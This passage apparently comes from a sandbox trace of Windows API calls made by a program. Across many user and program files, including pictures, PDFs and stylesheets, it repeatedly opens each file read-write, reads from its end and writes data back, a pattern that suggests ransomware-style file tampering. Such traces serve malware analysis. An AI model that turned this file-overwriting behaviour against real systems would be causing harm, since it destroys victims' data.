lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.336] CloseHandle (hObject=0x1d8) returned 1 [0076.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.337] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.337] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x58891 [0076.338] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.338] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.338] ReleaseMutex (hMutex=0x168) returned 1 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0076.338] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0076.340] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x57891 [0076.341] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.343] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x57891 [0076.343] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.344] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0076.344] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0076.344] CloseHandle (hObject=0x1d8) returned 1 [0076.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.346] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.346] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x18ed [0076.346] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.346] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.347] ReleaseMutex (hMutex=0x168) returned 1 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OrangeCircles.jpg", lpUsedDefaultChar=0x0) returned 17 [0076.347] ReadFile (in: hFile=0x1d8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x18ed, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f2bc*=0x18ed, lpOverlapped=0x0) returned 1 [0076.349] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0076.349] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1e75, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f2d0*=0x1e75, lpOverlapped=0x0) returned 1 [0076.350] CloseHandle (hObject=0x1d8) returned 1 [0076.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\ELcnWZnUTaYU.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\elcnwznutayu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.350] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.351] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5c16 [0076.351] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.351] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.351] ReleaseMutex (hMutex=0x168) returned 1 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ELcnWZnUTaYU.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ELcnWZnUTaYU.jpg", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ELcnWZnUTaYU.jpg", lpUsedDefaultChar=0x0) returned 16 [0076.352] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.353] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4c16 [0076.353] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.353] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4c16 [0076.353] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.354] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0076.355] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.355] CloseHandle (hObject=0x1d8) returned 1 [0076.355] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.356] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.356] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x780 [0076.356] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.357] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.357] ReleaseMutex (hMutex=0x168) returned 1 [0076.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.jpg", lpUsedDefaultChar=0x0) returned 9 [0076.357] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663858, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x331f2bc*=0x780, lpOverlapped=0x0) returned 1 [0076.624] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0076.625] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0xd08, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0xd08, lpOverlapped=0x0) returned 1 [0076.625] CloseHandle (hObject=0x1d8) returned 1 [0076.626] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.626] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.626] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xbea1f [0076.627] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.627] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.627] ReleaseMutex (hMutex=0x168) returned 1 [0076.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Koala.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Koala.jpg", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Koala.jpg", lpUsedDefaultChar=0x0) returned 9 [0076.627] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0076.630] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.631] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbda1f [0076.631] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e958a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e958a8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.636] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbda1f [0076.637] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.637] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0076.637] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0076.638] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.638] CloseHandle (hObject=0x1d8) returned 1 [0076.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.639] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.639] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x712e [0076.640] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.640] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.640] ReleaseMutex (hMutex=0x168) returned 1 [0076.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjet.xsl", lpUsedDefaultChar=0x0) returned 9 [0076.640] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.643] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x612e [0076.643] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e958a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e958a8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.644] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x612e [0076.644] WriteFile (in: hFile=0x1d8, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.644] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0076.644] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e958a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e958a8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.644] CloseHandle (hObject=0x1d8) returned 1 [0076.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\query.exe" (normalized: "c:\\program files\\microsoft sql server compact edition\\query.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\query.exe", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files\\Microsoft SQL Server Compact Edition\\query.exe", lpFilePart=0x331f690*="query.exe") returned 0x3f [0076.645] GetLastError () returned 0x20 [0076.646] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洠i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x51 [0076.646] LocalFree (hMem=0x696d20) returned 0x0 [0076.646] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.646] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0076.646] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.647] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\query.exe" (normalized: "c:\\program files\\microsoft sql server compact edition\\query.exe")) returned 0x20 [0076.647] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets", lpFilePart=0x331f690*="Workflow.VisualBasic.Targets") returned 0x60 [0076.648] GetLastError () returned 0x5 [0076.648] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0076.648] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.648] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.648] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0076.649] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.649] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.649] GetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets")) returned 0x20 [0076.650] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui" (normalized: "c:\\program files\\windows journal\\en-us\\pdialog.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.651] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui", lpFilePart=0x331f690*="PDIALOG.exe.mui") returned 0x36 [0076.651] GetLastError () returned 0x5 [0076.651] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0076.651] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.651] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.651] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0076.651] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.652] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui" (normalized: "c:\\program files\\windows journal\\en-us\\pdialog.exe.mui")) returned 0x20 [0076.652] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp" (normalized: "c:\\program files\\windows journal\\templates\\memo.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp", lpFilePart=0x331f690*="Memo.jtp") returned 0x33 [0076.653] GetLastError () returned 0x5 [0076.653] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0076.653] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.654] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.654] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0076.654] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.654] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp" (normalized: "c:\\program files\\windows journal\\templates\\memo.jtp")) returned 0x20 [0076.655] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files\\windows mail\\en-us\\winmail.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.655] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows 